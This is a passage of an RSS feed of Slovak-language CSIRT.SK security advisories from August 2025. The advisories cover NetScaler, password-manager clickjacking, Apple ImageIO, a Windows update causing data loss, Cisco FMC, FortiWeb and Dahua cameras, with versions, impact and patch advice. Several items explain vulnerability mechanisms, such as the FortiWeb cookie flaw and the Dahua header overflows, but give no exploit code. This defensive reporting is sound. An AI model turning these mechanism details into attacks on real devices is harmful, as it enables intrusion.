<p>Preveriť konfiguráciu NetScaler je možné v konfiguračnom súbore <em>ns.conf</em> podľa návodu na <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694938&amp;articleTitle=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_7775_CVE_2025_7776_and_CVE_2025_8424">webe výrobcu</a> v časti „What Customers Should Do“.</p>



<p>Spoločnosť Citrix informovala, že zraniteľnosť pravdepodobne aktívne zneužívajú útočníci.</p>



<p><strong>CVE-2025-7776</strong> (CVSS v4.0 skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť súvisí s pretečením pamäte, ktoré môže spôsobiť nedostupnosť služby. Pre jej zneužitie musí byť NetScaler nakonfigurovaný ako Gateway (virtuálny server VPN, ICA Proxy, CVPN, RDP Proxy) s naviazaným profilom PCoIP.</p>



<p>Preveriť konfiguráciu NetScaler je možné v konfiguračnom súbore podľa návodu na <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694938&amp;articleTitle=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_7775_CVE_2025_7776_and_CVE_2025_8424">webe výrobcu</a> v časti „What Customers Should Do“.</p>



<p><strong>CVE-2025-8424</strong> (CVSS v4.0 skóre 8,7)</p>



<p>Vysoko závažná zraniteľnosť súvisí s nesprávnym riadením prístupu v manažmentovému rozhraniu NetScaler. Pre jej zneužitie potrebuje útočník prístup ku NSIP, IP adresu Cluster Management, lokálnu IP adresu stránky GSLB alebo subnetovú IP s manažmentovým prístupom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zraniteľných verzií Citrix NetScaler aspoň na verzie:</p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1-47.48</li>



<li>NetScaler ADC a NetScaler Gateway 13.1-59.22</li>



<li>NetScaler ADC 13.1-37.241-FIPS a NDcPP</li>



<li>NetScaler ADC 12.1-55.330-FIPS a NDcPP</li>
</ul>



<p>Vo vzťahu ku zraniteľnosti CVE-2025-8424 odporúča Citrix nasadenie kontroly prístupov IDAM a zakázať lokálnu autentifikáciu. Výrobca odporúča tiež nevystavovať NSIP do internetu.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694938&amp;articleTitle=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_7775_CVE_2025_7776_and_CVE_2025_8424">https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694938&amp;articleTitle=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_7775_CVE_2025_7776_and_CVE_2025_8424</a></li>



<li><a href="https://www.netscaler.com/blog/news/critical-security-update-announced-for-netscaler-gateway-and-netscaler/">https://www.netscaler.com/blog/news/critical-security-update-announced-for-netscaler-gateway-and-netscaler/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2715/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Moduly manažérov hesiel pre webové prehliadače sú obeťou clickjackingu</title>
		<link>/posts/2711</link>
					<comments>/posts/2711#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 25 Aug 2025 14:08:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[clickbaiting]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[password managers]]></category>
		<guid isPermaLink="false">/?p=2711</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/click-1024x664.jpg" alt="" /></p>Bezpečnostný výskumník odhalil zraniteľnosť prídavných modulov pre webové prehliadače viacerých manažérov hesiel, ktorá umožňuje vykonávať clickbaitingové útoky a&#160;kradnúť z nich...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/click-1024x664.jpg" alt="" /></p>
<p><strong>Bezpečnostný výskumník odhalil zraniteľnosť prídavných modulov pre webové prehliadače viacerých manažérov hesiel, ktorá umožňuje vykonávať clickbaitingové útoky a&nbsp;kradnúť z nich citlivé údaje. Útočníci sa môžu dostať ku prihlasovacím údajom, ale aj platobným či osobným údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Bitwarden 2025.8.0 a staršie</li>



<li>Enpass 6.11.5 a&nbsp;staršie</li>



<li>KeePassXC-Browser 1.9.9.2 a&nbsp;staršie</li>



<li>1Password 8.11.7.2 a&nbsp;staršie</li>



<li>iCloud Passwords 3.1.25</li>



<li>LastPass 4.146.3 a&nbsp;staršie</li>



<li>LogMeOnce 7.12.4 a&nbsp;staršie</li>



<li>Dashlane verzie staršie ako 6.2531.1</li>



<li>Keeper verzie staršie ako 17.2.0</li>



<li>NordPass verzie staršie ako 5.13.24</li>



<li>ProtonPass 1.31.4 a&nbsp;staršie</li>



<li>RoboForm 9.7.5 a staršie</li>
</ul>



<p>Výskumník testoval iba tieto, no pravdepodobne budú zraniteľné aj mnohé ďalšie manažéry hesiel.</p>



<p><strong>Opis činnosti:</strong></p>



<p>Bezpečnostný výskumník Marek Tóth upozornil na zraniteľnosť viacerých manažérov hesiel voči krádeži kliknutí (tzv. clickbaiting), čo môže viesť k úniku obsahu odomknutých záznamov. Tie môžu okrem prihlasovacích údajov obsahovať aj platobné a osobné dáta. Voči clickbaitingovému útoku sú zraniteľné prídavné moduly manažérov pre internetové prehliadače.</p>



<p>Útočník potrebuje obeť presvedčiť, aby klikla na oznamovacie okno, cez ktoré je preložené neviditeľné okno s potvrdením vloženia údajov z manažéra do útočníkovho formuláru. Pokiaľ prídavný modul nemá definované dostatočne striktné obmedzenia prístupnosti ku svojim súborom a zdrojom pre webové stránky, môže napríklad útočník získať obsah citlivých súborov formou iframe.</p>



<p>Druhá forma útoku zneužíva škodlivý javascript, ktorý zneviditeľní prvky používateľského rozhrania prídavného modulu injektované do rozhrania DOM (document object model) prehliadača.</p>



<p>Útočník môže podvrhnúť neviditeľné menu manažéra hesiel pre výber prihlasovacích údajov na nevinne vyzerajúce potvrdenie o veku používateľa, alebo štandardne vyzerajúcu informáciu o používaní cookies. Nič netušiac, obeť kliknutím na ľubovoľné tlačidlo vyberie a odošle útočníkovi svoje prihlasovacie údaje.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zraniteľných aplikácií aspoň na:</p>



<ul>
<li>Bitwarden 2025.8.1</li>



<li>Enpass 6.11.6</li>



<li>Dashlane 6.2531.1</li>



<li>Keeper 17.2.0</li>



<li>NordPass 5.13.24</li>



<li>ProtonPass 1.31.6</li>



<li>RoboForm 9.7.6</li>
</ul>



<p>Ostatné aplikácie v čase vydania tohto varovania ešte nemajú opravu.</p>



<p>Najefektívnejšou ochranou voči podobným formám útokov je zakázanie automatického dopĺňania (autofill) v nastaveniach modulov, a samozrejme obozretnosť pri výbere navštevovaných webových stránok.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.malwarebytes.com/blog/news/2025/08/clickjack-attack-steals-password-managers-secrets">https://www.malwarebytes.com/blog/news/2025/08/clickjack-attack-steals-password-managers-secrets</a></li>



<li><a href="https://marektoth.com/blog/dom-based-extension-clickjacking/#password-managers">https://marektoth.com/blog/dom-based-extension-clickjacking/#password-managers</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2711/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná závažná zraniteľnosť Apple iOS, iPadOS a macOS</title>
		<link>/posts/2709</link>
					<comments>/posts/2709#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 22 Aug 2025 14:01:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2709</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple opravila vysoko závažnú aktívne zneužívanú zraniteľnosť v&#160;komponente ImageIO systémov macOS, iOS a&#160;iPadOS, ktoré umožňuje útočníkom spôsobiť poškodenie pamäte,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple opravila vysoko závažnú aktívne zneužívanú zraniteľnosť v&nbsp;komponente ImageIO systémov macOS, iOS a&nbsp;iPadOS, ktoré umožňuje útočníkom spôsobiť poškodenie pamäte, zneužiteľné na ďalšie fázy útoku. To nastáva pri spracovaní špeciálne upraveného obrázkového súboru.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>macOS Ventura, verzie staršie ako 13.7.8</li>



<li>macOS Sequoia, verzie staršie ako 15.6.1</li>



<li>macOS Sonoma, verzie staršie ako 14.7.8</li>



<li>iPadOS, verzie staršie ako 17.7.10</li>



<li>iPadOS, verzie staršie ako 18.6.2</li>



<li>iOS, verzie staršie ako 18.6.2</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-43300</strong><strong> (CVSS v3.1 skóre 8,8)</strong></p>



<p>Spoločnosť Apple vydala aktualizácie na opravu zneužívanej zero-day zraniteľnosti CVE-2025-43300 v platforme ImageIO, ktorá súvisí s možnosťou <strong>zápisu do pamäte mimo povolené hodnoty</strong>. Útočník môže obeti podvrhnúť <strong>škodlivý obrázok</strong>, ktorého spracovanie spôsobí <strong>poškodenie pamäte</strong>. To môže štandardne viesť k pádu systému alebo umožniť vzdialené vykonanie kódu.</p>



<p>Zraniteľnosť sa týka produktov iPhone od modelu XS, iPad Pro 10.5-inch, iPad Pro 13-inch, iPad Pro 12.9-inch 2. generácie a novšie, iPad Pro 11-inch od 1. generácie, iPad Air 3. generácie a novšie, iPad od 6. generácie,<strong> </strong>iPad mini od 5. generácie, a počítače Mac s macOS Ventura, Sequoia a Sonoma.</p>



<p><strong>Útočníci zraniteľnosť zneužívali v cielených sofistikovaných útokoch.</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia aspoň na verzie:</strong></p>



<ul>
<li>macOS Ventura 13.7.8</li>



<li>macOS Sequoia 15.6.1</li>



<li>macOS Sonoma 14.7.8</li>



<li>iPadOS 17.7.10</li>



<li>iPadOS 18.6.2</li>



<li>iOS 18.6.2</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/124925">https://support.apple.com/en-us/124925</a></li>



<li><a href="https://support.apple.com/en-us/124928">https://support.apple.com/en-us/124928</a></li>



<li><a href="https://thehackernews.com/2025/08/apple-patches-cve-2025-43300-zero-day.html">https://thehackernews.com/2025/08/apple-patches-cve-2025-43300-zero-day.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-43300">https://nvd.nist.gov/vuln/detail/CVE-2025-43300</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2709/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – júl 2025</title>
		<link>/posts/2704</link>
					<comments>/posts/2704#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 21 Aug 2025 11:24:24 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2704</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci júl 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci júl 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/08/MS202507.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 07/2025 PDF (1 718 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2704/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktualizácie Windows 11 24H2 môžu spôsobiť nesprávne fungovanie a poškodenie pevného disku</title>
		<link>/posts/2702</link>
					<comments>/posts/2702#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 21 Aug 2025 08:52:45 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<guid isPermaLink="false">/?p=2702</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>V aktualizácii programu Defender z&#160;augustového balíka Patch Tuesday sa nachádza chyba, ktorá môže spôsobiť chyby na pevných diskoch. Jej najčastejším...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/12/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>V aktualizácii programu Defender z&nbsp;augustového balíka Patch Tuesday sa nachádza chyba, ktorá môže spôsobiť chyby na pevných diskoch. Jej najčastejším prejavom je chýbajúci disk v&nbsp;súborovom systéme alebo poškodenie a&nbsp;strata dát. Problém sa podľa viacerých zdrojov prejavuje pri kontinuálnom zápise rádovo desiatok GB.</strong></p>



<p><strong>Problémová aktualizácia:</strong></p>



<ul>
<li>Windows 11 24H2 – kumulatívny balík aktualizácie KB5063878</li>
</ul>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Strata údajov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Microsoft zatiaľ</strong> <strong>nezverejnil definitívnu správu o&nbsp;príčine či mitigácii</strong> problému. Odporúčame však všetkým administrátorom a&nbsp;používateľom zasiahnutých systémov aby si pravidelne zálohovali a chránili dáta a&nbsp;sledovali oficiálne stránky výrobcu pre bližšie informácie o&nbsp;riešení možných problémov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.techpowerup.com/340032/microsoft-windows-11-24h2-update-may-cause-ssd-failures?amp">https://www.techpowerup.com/340032/microsoft-windows-11-24h2-update-may-cause-ssd-failures?amp</a></li>



<li><a href="https://zive.aktuality.sk/clanok/FtWAgiP/pouzivate-windows-zacali-sa-stracat-data-z-diskov-co-treba-urobit-kym-pride-oprava/">https://zive.aktuality.sk/clanok/FtWAgiP/pouzivate-windows-zacali-sa-stracat-data-z-diskov-co-treba-urobit-kym-pride-oprava/</a></li>



<li><a href="https://support.microsoft.com/en-us/topic/august-12-2025-kb5063878-os-build-26100-4946-e4b87262-75c8-4fef-9df7-4a18099ee294">https://support.microsoft.com/en-us/topic/august-12-2025-kb5063878-os-build-26100-4946-e4b87262-75c8-4fef-9df7-4a18099ee294</a></li>



<li><a href="https://support.microsoft.com/en-us/topic/august-12-2025-kb5063878-update-for-windows-server-2025-os-build-26100-4946-69b2de20-e07d-404a-a19f-fd8c4ae27e0f">https://support.microsoft.com/en-us/topic/august-12-2025-kb5063878-update-for-windows-server-2025-os-build-26100-4946-69b2de20-e07d-404a-a19f-fd8c4ae27e0f</a></li>



<li><a href="https://www.windowslatest.com/2025/08/12/windows-11-kb5063878-24h2-boosts-performance-adds-quick-machine-recovery-agentic-settings/">https://www.windowslatest.com/2025/08/12/windows-11-kb5063878-24h2-boosts-performance-adds-quick-machine-recovery-agentic-settings/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2702/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Cisco Secure Firewall Management Center dovoľuje vykonávať systémové príkazy</title>
		<link>/posts/2700</link>
					<comments>/posts/2700#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 18 Aug 2025 14:55:04 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Cisco Secure FMC]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2700</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco opravila kritickú zraniteľnosť v Cisco Secure Firewall Management Center, ktorá z&#160;dôvodu nevhodnej validácie používateľských vstupov dovoľuje vzdialenému útočníkovi...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco opravila kritickú zraniteľnosť v Cisco Secure Firewall Management Center, ktorá z&nbsp;dôvodu nevhodnej validácie používateľských vstupov dovoľuje vzdialenému útočníkovi pri prihlasovaní odoslať požiadavku obsahujúcu príkaz Shell. Ten zraniteľné zariadenie vykoná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Secure FMC 7.0.7 a&nbsp;7.7.0</li>
</ul>



<p>Aplikácia musí mať povolenú autentifikáciu do manažmentového rozhrania cez RADIUS a/alebo SSH.</p>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-20265 </strong>(CVSS v3.1 skóre 10,0)</p>



<p>Cisco Secure Firewall Management Center (FMC) obsahuje kritickú zraniteľnosť v&nbsp;komponente pre protokol RADIUS. Zraniteľnosť súvisí s&nbsp;nedostatočnou kontrolou používateľských vstupov pri autentifikácii voči serveru RADIUS. Vzdialenému neautentifikovanému útočníkovi dovoľuje pri prihlasovaní injektovať príkazy Shell do odosielanej požiadavky, ktoré zariadenie vykoná s&nbsp;vysokými oprávneniami.</p>



<p>Zraniteľnosť je aktívna, ak má aplikácia povolenú autentifikáciu do manažmentového rozhrania cez protokol RADIUS a/alebo SSH.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie príkazov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame bezodkladne aktualizovať zraniteľné inštancie Cisco Secure FMC na najnovšiu verziu.</p>



<p>Ak aktualizácie nie je možná, odporúčame mitigovať zraniteľnosť zakázaním prístupu do manažmentového rozhrania cez protokoly RADIUS a&nbsp;SSH.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-radius-rce-TNBKf79">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-radius-rce-TNBKf79</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-20265">https://nvd.nist.gov/vuln/detail/CVE-2025-20265</a></li>



<li><a href="https://thehackernews.com/2025/08/cisco-warns-of-cvss-100-fmc-radius-flaw.html">https://thehackernews.com/2025/08/cisco-warns-of-cvss-100-fmc-radius-flaw.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2700/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažná zraniteľnosť FortiWeb umožňuje obísť autentifikáciu</title>
		<link>/posts/2698</link>
					<comments>/posts/2698#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 18 Aug 2025 14:53:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[FortiWeb]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2698</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet opravila vysoko závažnú zraniteľnosť vo svojich zariadeniach FortiWeb, ktorá z&#160;dôvodu nevhodnej validácie parametrov v&#160;cookies umožňuje vzdialeným útočníkom obísť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet opravila vysoko závažnú zraniteľnosť vo svojich zariadeniach FortiWeb, ktorá z&nbsp;dôvodu nevhodnej validácie parametrov v&nbsp;cookies umožňuje vzdialeným útočníkom obísť autentifikáciu a&nbsp;získať administrátorské oprávnenia.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiWeb 7.6.0 až 7.6.3</li>



<li>FortiWeb 7.4.0 až 7.4.7</li>



<li>FortiWeb 7.2.0 až 7.2.10</li>



<li>FortiWeb 7.0.0 až 7.0.10</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-52970 </strong>(CVSS v3.1 skóre 7,7)</p>



<p>Vysoko závažná zraniteľnosť FortiWeb spočíva v&nbsp;nesprávnej validácii/spracovaní parametra Era v cookies, čo umožňuje útočníkovi nastaviť tento parameter na neočakávanú hodnotu, čím server použije nulový tajný kľúč pre šifrovanie a HMAC podpisovanie relácie. Neautentifikovaný vzdialený útočník môže poslať špeciálne vytvorenú požiadavku, čím obíde autentifikáciu a&nbsp;získa administrátorské oprávnenia na zraniteľnom zariadení. Na to potrebuje poznať nešpecifikovanú neverejnú informáciu týkajúcu sa cieľového zariadenia a používateľa.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie prihlásenia</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame bezodkladne aktualizovať zraniteľné inštancie aspoň na verziu</p>



<ul>
<li>FortiWeb 7.6.4 alebo novšiu</li>



<li>FortiWeb 7.4.8 alebo novšiu</li>



<li>FortiWeb 7.2.11 alebo novšiu</li>



<li>FortiWeb 7.0.11 alebo novšiu</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.fortiguard.com/psirt/FG-IR-25-448">https://www.fortiguard.com/psirt/FG-IR-25-448</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-52970">https://www.cve.org/CVERecord?id=CVE-2025-52970</a></li>



<li><a href="https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970">https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2698/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Analytici upozorňujú na bezpečnostné kamery DAHUA &#8211; majú 2 závažné zraniteľnosti</title>
		<link>/posts/2695</link>
					<comments>/posts/2695#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 18 Aug 2025 14:52:28 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Dahua]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2695</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/dahua-1024x614.jpeg" alt="" /></p>Bezpečnostní výskumníci z Bitdefender IoT Research Team zverejnili informácie o zraniteľnostiach CVE-2025-31700 &#160;a CVE-2025-31701 vo firmvéri pre bezpečnostné kamery značky...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/dahua-1024x614.jpeg" alt="" /></p>
<p><strong>Bezpečnostní výskumníci z Bitdefender IoT Research Team zverejnili informácie o zraniteľnostiach CVE-2025-31700 &nbsp;a CVE-2025-31701 vo firmvéri pre bezpečnostné kamery značky Dahua. Ide o&nbsp;závažné zraniteľnosti, ktoré vie útočník zneužiť na vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>IPC-1XXX Series</li>



<li>IPC-2XXX Series</li>



<li>IPC-WX Series</li>



<li>IPC-ECXX Series</li>



<li>SD3A Series</li>



<li>SD2A Series</li>



<li>SD3D Series</li>



<li>SDT2A Series</li>



<li>SD2C Series</li>



<li>TPC-AEBF5201 Series</li>



<li>TPC-CA Series</li>
</ul>



<p>Zraniteľné sú všetky verzie vydané pred 16.4.2025.</p>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-31700 </strong>(CVSS 3.1 skóre 8,1)</p>



<p>Nástroj na spracovanie požiadaviek pre protokol ONVIF na porte 80 nesprávne parsuje hlavičku Host tak, že pri jej kopírovaní nehľadí na veľkosť kópie, ktorá môže byť väčšia ako vyhradený zásobník pamäte. To sa deje v&nbsp;prípade formátu hlavičky obsahujúceho špeciálne znaky, ktoré nástroj na spracovanie požiadaviek nedovoľuje. Neautentifikovaný útočník môže týmto spôsobom zapísať ľubovoľný počet bajtov do zásobníka a&nbsp;získať možnosť vykonávať kód, alebo spôsobiť nedostupnosť služby.</p>



<p><strong>CVE-2025-31701 </strong>(CVSS 3.1 skóre 8,1)</p>



<p>Nástroj na spracovanie nezdokumentovaného koncového bodu POST /RPC2_UploadFileWithName/* kopíruje hlavičku Cseq&nbsp;HTTP priamo do sekcie pamäte .bss rovnakou funkciou (<em>strncpy</em>) ako v&nbsp;predchádzajúcej zraniteľnosti. Tým môže neautentifikovaný útočník opäť zapísať ľubovoľný počet bajtov do zásobníka pamäte a&nbsp;získať možnosť vykonávať kód, alebo spôsobiť nedostupnosť služby.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Narušenie integrity a&nbsp;dôveryhodnosti systému</strong></li>



<li><strong>Narušenie bezpečnosti monitorovaného objektu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;majiteľom zraniteľných systémov odporúčame vykonať bezpečnostné aktualizácie dostupné na stránkach výrobcu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-31700">https://nvd.nist.gov/vuln/detail/CVE-2025-31700</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-31701">https://nvd.nist.gov/vuln/detail/CVE-2025-31701</a></li>



<li><a href="https://www.dahuasecurity.com/aboutUs/trustedCenter/details/775">https://www.dahuasecurity.com/aboutUs/trustedCenter/details/775</a></li>



<li><a href="https://www.techradar.com/pro/security/hackers-could-take-over-millions-of-dahua-cctv-cameras-because-of-two-critical-flaws-heres-how-to-stay-safe">https://www.techradar.com/pro/security/hackers-could-take-over-millions-of-dahua-cctv-cameras-because-of-two-critical-flaws-heres-how-to-stay-safe</a></li>



<li><a href="https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-dahua-hero-c1-smart-cameras">https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-dahua-hero-c1-smart-cameras</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2695/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci augustového Patch Tuesday opravil viacero kritických a zero-day zraniteľnosť</title>
		<link>/posts/2691</link>
					<comments>/posts/2691#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 15 Aug 2025 13:03:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2691</guid>

